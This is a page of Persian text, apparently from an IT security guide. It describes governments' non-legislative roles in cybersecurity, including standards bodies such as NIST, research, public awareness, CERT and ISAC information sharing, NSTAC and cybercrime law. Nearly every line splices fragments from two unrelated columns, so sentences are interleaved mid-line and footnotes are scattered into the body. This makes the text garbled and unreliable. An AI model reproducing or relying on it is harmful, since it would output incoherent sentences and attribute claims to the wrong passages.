ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﻭ ﺟﺎﻣﻌﺔ ﺗﺠـﺎﺭﻱ ﺩﺭﻳﺎﺑﻨـﺪ ،ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ .ﻃﺒﻖ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ،ﺷﺮﻛﺘﻲ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳـﻂ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺧـﻮﺩ-ﻗﺎﻧﻮﻧﮕـﺬﺍﺭ ﻛﻪ ﺩﺭ ﻣﺘﻮﻥ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻋﻼﻡ ﻣﻲﺩﺍﺭﺩ "ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻳﻤـﻦ
ﺍﺻﻼﺡ ﺷﻮﻧﺪ. ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ" ،ﺍﻳﻨﮕﻮﻧﻪ ﻓﺮﺽ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑـﺎ ﻣـﺸﺘﺮﻱ ﺧـﻮﺩ
ﻭﺍﺭﺩ ﻳﻚ ﺗﻮﺍﻓﻖ ﺩﻭﻃﺮﻓﻪ ﺷﺪﻩ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻣﻮﻇﻒ ﺑﻪ ﺗﻌﺎﻣﻞ ﺑـﺎ
ﻣــﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻣﺤﻴﻄــﻲ ﺍﻣــﻦ ﻣــﻲﺑﺎﺷــﺪ .ﺩﺭ ﭼﻨــﻴﻦ ﺣــﺎﻟﺘﻲ،
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻱ ﺑﺎ ﺣﻤـﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺑﻪ ﺧﻄﺮ ﺑﻴﺎﻓﺘﺪ ﻣﺸﺘﺮﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺩﻋـﺎﻱ ﻧﻘـﺾ ﺗﻌﻬـﺪﺍﺕ ﻛﻨـﺪ.
ﻫﻤﭽﻨﻴﻦ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑﺮ ﻭﺏ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﻨـﺪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺣﺴﺐ ﻗﺮﺍﺭﺩﺍﺩ ،ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ
ﺧﺪﻣﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺑﮕﻴﺮﻧﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻧﻴـﺰ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭ ﺍﺛﺮ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ٦٩ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﻭ ﺍﺭﺍﺋﻪ
ﺳﺮﻭﻳﺲ ﺑﺎﺯ ﺑﻤﺎﻧﺪ ،ﺷﺮﻛﺖ ﺩﺭ ﻣﻌﺮﺽ ﺍﺩﻋـﺎﻱ ﻧﻘـﺾ ﺗﻌﻬـﺪﺍﺕ
ﺗﻮﺳﻂ ﻣﺸﺘﺮﻳﺎﻥ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ.
ﺩﺭ ﺍﻧﺘﺸﺎﺭ ﻋﻤﻮﻣﻲ ﻧﺘﺎﻳﺞ ﺗﺤﻘﻴﻘﺎﺕ ،ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺑﺎﻳـﺪ ﺑـﻪ ﺻﻨﻌﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ ﺻﻨﻌﺖ ﺑﻬﺪﺍﺷـﺖ ﺭﺍ ﺑﻄـﻮﺭ ﺷـﻔﺎﻑ ﺗﻌﺮﻳـﻒ
ﻧﻮﻋﻲ ﺑﺮ ﻣﻴﻞ ﺧﻮﺩ ﺑﻪ ﻣﺨﻔﻲﻛﺎﺭﻱ ﻏﻠﺒﻪ ﻛﻨﻨﺪ .ﻳﻚ ﻣﺜﺎﻝ ﺧﻮﺏ ﻧﻤﻮﺩﻩﺍﻧﺪ .ﺩﺭ ﺍﺩﺍﻣﻪ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﻄﻮﺭ ﻣﻔﺼﻞ ﺗﺸﺮﻳﺢ ﻣﻲﺷﻮﻧﺪ ،ﺍﻣﺎ
ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ،ﺳـﺎﺯﻣﺎﻥ ﻓـﻮﻕ ﺳـﺮﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ﺩﺭ ﺍﻳـﺎﻻﺕ ﺍﺑﺘﺪﺍ ﺑﻪ ﺑﺮﺧﻲ ﻧﻘﺸﻬﺎﻱ ﻣﻬﻢ ﺩﻭﻟﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ
ﻣﺘﺤﺪﻩ ﺍﺳﺖ ﻛﻪ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻛﻪ ﻫﻤﮕﻲ ﻏﻴﺮ ﺍﺯ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻫﺴﺘﻨﺪ.
ﻫﻤﮕﺎﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻋﻤﻮﻣﻲ ﺳﺎﺯﻣﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ -ﺩﻭﻟﺖ ﻫﻤﭽﻨﻴﻦ ﻳﻜـﻲ ﺍﺯ ﺗـﺼﻤﻴﻢﮔﻴﺮﻧـﺪﮔﺎﻥ ﻧﻘﺸﻬﺎﻱ ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺩﻭﻟﺖ
ﻣﻬــﻢ ﺩﺭ ﺗﻌﻴــﻴﻦ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﺍﺳــﺖ. ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﺑـﺮ ﺍﻣﻨﻴـﺖ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﻏﻴﺮ ﺗﻘﻨﻴﻨﻲ ،ﺩﺍﻭﻃﻠﺒﺎﻧﻪ ﻭ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ
ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺍﺳﺖ ،ﺍﻣﺎ ﻣﺘﺨﺼﺼﺎﻥ ﺩﻭﻟﺘﻲ ﻫﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺍﻳﻦ ﻫﻤﻪ ﺍﺯ ﻧﻮﻉ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻧﻴﺴﺘﻨﺪ؛ ﺑﻠﻜﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻛﻪ ﺷـﺎﻳﺪ
ﺯﻣﻴﻨﻪ ﻣﺸﺎﺭﻛﺖ ﻛﻨﻨﺪ -ﺑﻮﻳﮋﻩ ﺍﮔـﺮ ﺩﻭﻟـﺖ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﺗﺄﺛﻴﺮ ﺑﻴﺸﺘﺮﻱ ﻫﻢ ﺩﺍﺭﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺑﺎﺷﻨﺪ.
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺨﺶ ﺩﻭﻟﺘﻲ ﺣﻤﺎﻳﺖ ﻛﻨﺪ.
ﺗﺤﻘﻴﻖ -ﻳﻜﻲ ﺍﺯ ﻧﻘـﺸﻬﺎﻱ ﻣﻬـﻢ ﺩﻭﻟـﺖ ،ﺗـﺄﻣﻴﻦ ﺳـﺮﻣﺎﻳﻪ ﻭ
ﺁﮔﺎﻫﻲ ،ﺁﻣﻮﺯﺵ ﻭ ﻇﺮﻓﻴﺖ ﺳﺎﺯﻱ :ﻳﻜﻲ ﺩﻳﮕﺮ ﺍﺯ ﻧﻘﺸﻬﺎﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﺩﺭﺑـﺎﺭﻩ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺍﺳـﺖ .ﻣﺆﺳـﺴﻪ ﻣﻠـﻲ
ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺩﻭﻟﺖ ،ﺁﻣﻮﺯﺵ ﻋﻤـﻮﻣﻲ ﻭ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ ﺑﺨـﺸﻬﺎﻱ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨــﺎﻭﺭﻱ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ ) ٧١(NISTﺳــﺎﺯﻣﺎﻥ
ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﺁﮔـﺎﻫﻲ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎ ﻭ ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺩﻭﻟـﺖ ﺩﺭ ﻭﺯﺍﺭﺕ ﺑﺎﺯﺭﮔـﺎﻧﻲ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺍﺳـﺖ.
ﺭﻭﺷﻬﺎﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺳﺖ .ﻣﻄﺎﻟﻌﺎﺕ ﻣﻮﺭﺩﻱ ﻭ ﮔﺰﺍﺭﺷﻬﺎﻳﻲ ﻣﺎﻧﻨﺪ ﻣﺄﻣﻮﺭﻳﺖ NISTﺗﻬﻴﻪ ﻭ ﺍﺭﺗﻘﺎﻱ ﻣﻌﻴﺎﺭﻫﺎ ،ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﻓﻨﺎﻭﺭﻱ
ﺁﻧﭽﻪ ﻛﻪ ﭘﻴﺸﺘﺮ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻧﺪ ،ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺍﻳـﻦ
ﻫﺪﻑ ﻣﻲﺑﺎﺷﻨﺪ .ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺍﺯ ﺍﻋﻀﺎﻱ ﺧـﻮﺩ ﺧﻮﺍﺳـﺘﻪ ﻛـﻪ 70 Data Protection Directive
71 National Institute of Standards and
Technology
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٤٦
ﭘﻴﺸﻘﺪﻡ ﺷﺪ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ CERTﺭﺍ ﺗﻬﻴﻪ ﻛﺮﺩ .ﮔـﺮﻭﻩ G8 ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﺮﺍﻱ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻨﺪ ﻛﻪ ﻫﻤﺔ
ﻧﻴﺰ ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﻧﻘﺎﻁ ﺗﻤﺎﺱ ﺩﺍﺋﻤﻲ ﺍﻳﺠﺎﺩ ﻛـﺮﺩ ﺗـﺎ ﻫﻤﻜـﺎﺭﻱ ﻭ ﻃﻴﻔﻬــﺎﻱ ﻣﺨــﺎﻃﺒﻴﻦ ﺭﺍ ﺩﺭ ﺑــﺮ ﺑﮕﻴــﺮﺩ .ﺍﺭﺍﺋــﻪ ﮔﺰﺍﺭﺷــﻬﺎ ﻭ
ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺯﻣﻴﻨﺔ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗـﺴﻬﻴﻞ ﺷـﻮﺩ؛ ﻭ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﺑﻪ ﻣﺠﺎﻣﻊ ﻣﺘﺨﺼﺼﻴﻦ ﺩﺭ ﺍﻓﺰﺍﻳﺶ ﺁﮔـﺎﻫﻲ
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﻭﻟﺘﻬﺎﻱ ﻏﻴﺮ ﻋﻀﻮ ﺩﺭ ﮔﺮﻭﻩ G8ﻧﻴﺰ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻣﺆﺛﺮ ﺍﺳﺖ .ﺁﻣﻮﺯﺵ ﻫﻤﭽﻨـﻴﻦ ﺷـﺎﻣﻞ ﺑﻮﺭﺳـﻬﺎﻱ ﺗﺤـﺼﻴﻠﻲ ﻭ
ﺩﺭ ﺁﻥ ﻣﺸﺎﺭﻛﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ. ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﻮﺳﻌﻪﺍﻱ ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺩﺍﻧﺶ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ﻧﻴـﺰ
ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺩﻭﻟﺘﻬﺎﻱ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﺷﻜﺎﻝ ﻣﻲﺑﺎﺷﺪ .ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﺗﻮﺻﻴﻪ ﻛﺮﺩﻩ ﻛـﻪ
ﻣﺨﺘﻠــﻒ ﺩﺭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﻣﺆﺳــﺴﺎﺗﻲ ﺍﻳﺠــﺎﺩ ﻧﻤﺎﻳــﺪ ﻛــﻪ ﺗﻤﺮﻛﺰ ﺑﻴﺸﺘﺮ ﺩﻭﺭﻩﻫﺎ ﺭﺍ ﺑﺮ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﺩﺍﻭﻃﻠﺒﺎﻧﺔ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻛﻨﻨـﺪ؛ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ -ﻳﻜﻲ ﺩﻳﮕﺮ ﺍﺯ ﻧﻘـﺸﻬﺎﻱ ﻣﻬـﻢ ﺩﻭﻟـﺖ،
ﻫﻤﭽﻮﻥ ﻣﺮﺍﻛﺰ ﺍﺷﺘﺮﺍﻙ ﻭ ﺗﺤﻠﻴﻞ ﺍﻃﻼﻋﺎﺕ ) .٧٥(ISACﺑﻌﻨـﻮﺍﻥ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺑﺎﺭﺓ ﺁﺳـﻴﺐ ﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ،
ﻣﺜﺎﻝ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﺍﻱ ﺑﺨـﺸﻬﺎﻱ ﺧـﺎﺹ ﺻـﻨﻌﺖ )ﻫﻤﭽـﻮﻥ ﺍﺧﻄﺎﺭ ﺩﺭ ﻣﻮﺭﺩ ﻭﻳﺮﻭﺳﻬﺎ ﻭ ﺣﻤـﻼﺕ ﺟﺪﻳـﺪ ،ﺍﺭﺍﺋـﻪ ﭘﻴـﺸﻨﻬﺎﺩﺍﺕ
ﺧﺪﻣﺎﺕ ﺑﺨـﺶ ﻣـﺎﻟﻲ ،ﺑﺨـﺶ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺗﻠﻔﻨـﻲ ﻭ ﺻـﻨﻌﺖ ﻧﻴـﺮﻭﻱ ﺑـﺮﻕ( ﺑﺮﺍﻱ ﺣﻞ ﻣﺸﻜﻼﺕ ،ﻭﺻﻠﻪ ﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ٧٢ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ
ISACﺗﺄﺳﻴﺲ ﻧﻤﻮﺩﻩ ﻭ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻣﺜﻞ ﻛﺎﻧﺎﺩﺍ ،ﺁﻟﻤﺎﻥ ،ﮊﺍﭘﻦ ﻭ ﻣﻲﺑﺎﺷﺪ .ﺩﻭﻟﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻮﺩﺟﺔ ﻣﺮﺍﻛﺰ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻧﻈﻴـﺮ
ﻫﻠﻨﺪ ﻧﻴﺰ ﺩﺍﺭﺍﻱ ISACﻣﻲﺑﺎﺷـﻨﺪ .ﺍﻧﮕﻠـﺴﺘﺎﻥ ﺑـﺪﻧﺒﺎﻝ ﻣﻔﻬـﻮﻡ ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ) ٧٣(CERTﻭ ﻣﺮﺍﻛﺰ ﻫﻤﻜـﺎﺭﻱ
) ٧٦WARPﻫﺸﺪﺍﺭ ،ﺗﻮﺻﻴﻪ ﻭ ﮔﺰﺍﺭﺵ ﻧﻜﺎﺕ( ﻣﻲﺑﺎﺷﺪ -ﻳﻚ ﺷﺒﻜﻪ ﻛﻪ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑﺮﭘﺎ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺗﺄﻣﻴﻦ ﺳﺎﺯﺩ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ
ﺳﺮﺍﺳﺮﻱ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺑﻬﺘﺮ ﻭ ﺳﺮﻳﻌﺘﺮ ﺗﻮﺻـﻴﻪﻫـﺎ ﻭ ﻫـﺸﺪﺍﺭﻫﺎﻱ CERTﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺩﺭ ﺩﺍﻧـﺸﮕﺎﻩ Carnegie Mellon
ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻭ ﻧﻴﺰ ﺩﺭﻳﺎﻓﺖ ﻛﺎﻣﻠﺘﺮ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺣـﻮﺍﺩﺙ ﻳﻚ ﻣﺮﻛﺰ ﺗﺤﻘﻴﻖ ﻭ ﺗﻮﺳﻌﺔ ﺩﻭﻟﺘﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺍﺋـﻪ ﻛﻤـﻚ
ﺩﺭ ﺁﻥ ﻛﺸﻮﺭ. ﺑﻪ ﺍﺩﺍﺭﺓ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ،ﺍﻧﺘﺸﺎﺭ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ،
ﻫﻤﭽﻨﻴﻦ ﺩﻭﻟﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﺑﻬﺘـﺮ ﺍﻃﻼﻋـﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺗﺤﻘﻴﻖ ﺩﺭﺑﺎﺭﺓ ﺗﻐﻴﻴـﺮﺍﺕ ﺑﻠﻨـﺪﻣـﺪﺕ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺷـﺒﻜﻪﺍﻱ ،ﻭ
ﻛﻤﻴﺘﻪ ﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﻋﻤـﻮﻣﻲ ﺍﻳﺠـﺎﺩ ﻛﻨـﺪ .ﺑﻌﻨـﻮﺍﻥ ﻧﻤﻮﻧـﻪ ﻫﻤﭽﻨﻴﻦ ﺁﻣـﻮﺯﺵ ﻧﺤـﻮﺓ ﺗﻬﻴـﺔ ﻃﺮﺣﻬـﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺗﻲ
٧٧
ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻛﻤﻴﺘﺔ ﻣﺸﺎﻭﺭﺍﻥ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻣﺨـﺎﺑﺮﺍﺕ )(NSTAC ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕـﺮﻱ ﻛـﻪ CERTﺩﺭ
ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﻣﺘـﺸﻜﻞ ﺍﺳـﺖ ﺍﺯ ﺳـﻲ ﻧﻤﺎﻳﻨـﺪﺓ ﻣﻬـﻢ ﺻـﻨﻌﺖ ﺁﻧﻬــﺎ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻋﺒﺎﺭﺗﻨــﺪ ﺍﺯ ﻣــﺎﻟﺰﻱ ،ﮊﺍﭘــﻦ ،ﺍﺳــﺘﺮﺍﻟﻴﺎ ﻭ ﻛــﺮﻩ.
ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ،ﺷـﺮﻛﺘﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ Mcertﻳﻚ ﻣﺮﻛﺰ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ
ﺍﻃﻼﻋــﺎﺕ ،ﻭ ﻣﻘﺎﻣــﺎﺕ ﻣــﺴﺌﻮﻝ ﺍﻣﻨﻴــﺖ ﻣﻠــﻲ ﻭ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺷﺮﻛﺘﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﺩﺭ ﺁﻟﻤﺎﻥ ﺍﺳﺖ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﻣﻴﺎﻥ
ﺍﺭﺗﺒـﺎﻃﻲ ﺍﺿـﻄﺮﺍﺭﻱ NSTAC .ﻧﻴـﺰ ﻣـﺸﺎﻭﺭ ﺻـﻨﻌﺘﻲ ﺭﺋــﻴﺲ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭ ﻋﻤﻮﻣﻲ ﺭﺍ ﺗﻮﺳﻂ ﺍﻧﺠﻤﻦ BITKOM ICT
ﺟﻤﻬﻮﺭ ﺩﺭ ﺧﺼﻮﺹ ﻣﺸﻜﻼﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻭ ﺁﻣـﺎﺩﮔﻲ ﺁﻟﻤﺎﻥ ،ﻫﻔﺖ ﭘﺸﺘﻴﺒﺎﻥ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺻﻨﻌﺘﻲ ﻭ ﻧﻴﺰ ﺩﻭﻟـﺖ ﺍﻳـﻦ
ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺍﺳﺖ. ﻛﺸﻮﺭ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﺩ.
ﺑﺘﺪﺭﻳﺞ ﺑـﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺑﻬﺘـﺮ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺳـﻄﺢ ﻣﻨﻄﻘـﻪﺍﻱ ﻭ
ﻗﺎﻧﻮﻥ ﺟﺮﺍﺋﻢ ﻓﺮﺍﻣﻨﻄﻘﻪﺍﻱ ،ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﭼﻨﺪﻣﻠﻴﺘﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ .ﻛﻤﻴﺴﻴﻮﻥ
ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﻛﻪ ﺩﻭﻟﺖ ﺑﺎ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺑﺨـﺶ ﺍﺭﻭﭘﺎ ﺩﺭ ﮊﻭﺋﻦ ﺳﺎﻝ ۲۰۰۱ﻳـﻚ ﻣﻌﺎﻫـﺪﻩ ﺩﺭ ﺧـﺼﻮﺹ ﺗﻘﻮﻳـﺖ
ﺧــﺼﻮﺻﻲ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﻛﻨــﺪ "ﻗــﺎﻧﻮﻥ ﺟــﺮﺍﺋﻢ" ﺍﺳــﺖ .ﻣﺆﺳــﺴﺎﺕ CERTﺩﺭ ﺍﺭﻭﭘﺎ ﻭ ﻣﺸﺎﺭﻛﺖ ﺑﻬﺘﺮ ﺍﻋـﻀﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺁﻥ ﻣﺮﻛـﺰ
ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭ ﻣﻨﻄﻘﻪﺍﻱ ﭘﻴﺸﻨﻬﺎﺩ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﻫﺮ ﻛـﺸﻮﺭ ﺑﻌﻨـﻮﺍﻥ ﻣﻨﺘﺸﺮ ﻛﺮﺩ .ﺩﺭ ﻓﻮﺭﻳﻪ ۲۰۰۳ﺍﻳﻦ ﻛﻤﻴﺴﻴﻮﻥ ﮔﺎﻡ ﻓﺮﺍﺗﺮﻱ ﻧﻬﺎﺩ ﻭ
ﺑﺨﺸﻲ ﺍﺯ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑﻬﺒﻮﺩ ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺗــﺼﻤﻴﻢ ﺧــﻮﺩ ﻧــﺴﺒﺖ ﺑــﻪ ﺍﻳﺠــﺎﺩ ﺳــﺎﺯﻣﺎﻥ ﺍﻣﻨﻴــﺖ ﺷــﺒﻜﻪ ﻭ
